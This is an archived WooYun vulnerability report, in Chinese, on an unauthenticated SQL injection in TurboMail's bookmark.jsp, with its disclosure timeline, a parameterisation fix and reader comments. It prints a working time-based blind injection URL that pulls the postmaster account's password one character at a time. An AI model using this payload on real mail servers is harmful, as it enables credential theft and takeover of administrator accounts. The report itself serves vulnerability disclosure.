Turbomail sql注入漏洞

漏洞概要

缺陷编号:WooYun-2015-0126135

漏洞标题:Turbomail sql注入漏洞

相关厂商:turbomail.org

漏洞作者:Noxxx

提交时间:2015-07-13 10:01

公开时间:2015-10-16 10:03

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

Tags标签:

漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-18: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息)
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开

简要描述:

如标题

详细说明:

文件名:bookmark.jsp

这里传入了bookmarkselect参数我们跟进去看看。

看吧。。直接拼接到sql字符串中,而不是参数化,就直接送入查询,所以我们可以造成sql注入并且无需登录。

漏洞证明:

判断第一位是不是Y如果是那么就延迟一秒时间,我们在随便打一个看看返回多少

看吧 第一位不为W,比刚刚少一秒时间。poc测试:**.**.**.**:8080/bookmark.jsp?command=delete&bookmarkselect=288888889) AND (SELECT * FROM (SELECT SLEEP(MID(tpassword,1,1)='Y') FROM accountutil WHERE username='postmaster')X

修复方案:

参数化。这个也可以删除任意t_bookmark表里的任意数据,并木有验证。

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-1610:03

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-08-16:本漏洞已经在更新补丁中修复

评价

  1. 2010-01-01 00:00 黑暗游侠 白帽子 | Rank:1058 漏洞数:93)

    昨晚3点准备提交这个邮件的,和另一个cms全版本通杀getshell,结果先提交了机锋网的sqlzhuru然后睡觉了。。

  2. 2010-01-01 00:00 #6c6c6c 白帽子 | Rank:237 漏洞数:20)

    @黑暗游侠 我前天就提了,没审,估计洞主比较早。

  3. 2010-01-01 00:00 黑暗游侠 白帽子 | Rank:1058 漏洞数:93)

    @#6c6c6c 嗯嗯